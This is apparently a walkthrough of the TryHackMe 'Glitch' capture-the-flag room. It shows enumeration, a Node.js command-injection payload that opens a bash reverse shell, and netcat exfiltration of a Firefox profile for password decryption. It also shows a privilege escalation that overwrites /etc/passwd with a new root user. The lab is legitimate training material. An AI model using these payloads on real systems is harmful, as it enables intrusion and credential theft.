GLITCH

Room Link: https://tryhackme.com/room/glitch

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/80 - HTTP

Looking into api directory we find a items page

Kali

gobuster dir -u http://$VICTIM/api -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Change the request from GET to POST and it gives an interesting message

Running the below shows it is vulnerable

Initial Shell

Kali

nc -lvnp

Burp

POST /api/items?cmd=require("child_process").exec('bash+-c+"bash+-i+>%26+/dev/tcp/$KALI/1337+0>%261"') HTTP/1.1
Host: 10.10.22.153
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: token=value
Upgrade-Insecure-Requests: 1

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Lateral Movement

Victim

tar -cvf backup.tar.gz .firefox/

Netcat

Kali(receiving)

nc -l -p 1234 > backup.tar.gz

Victim(sending)

nc -w 3 $KALI 1234 < backup.tar.gz

Kali

tar xvf backup.tar.gz 
git clone https://github.com/unode/firefox_decrypt.git
python3.9  firefox_decrypt/firefox_decrypt.py .firefox/

Victim

su v0id
Password: love_the_void

Victim

find / -perm -u=s -type f 2> /dev/null

Victim

/usr/local/bin/doas -u root cat /root/root.txt

Privilege Escalation

I used doas to read the passwd file, make a backup called passwd.old just in case it broke and passwd.new and added a new user

Victim

/usr/local/bin/doas -u root cat /etc/passwd
vi /tmp/passwd.new
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

/usr/local/bin/doas -u root cp /tmp/passwd.new /etc/passwd
su new
Password: 123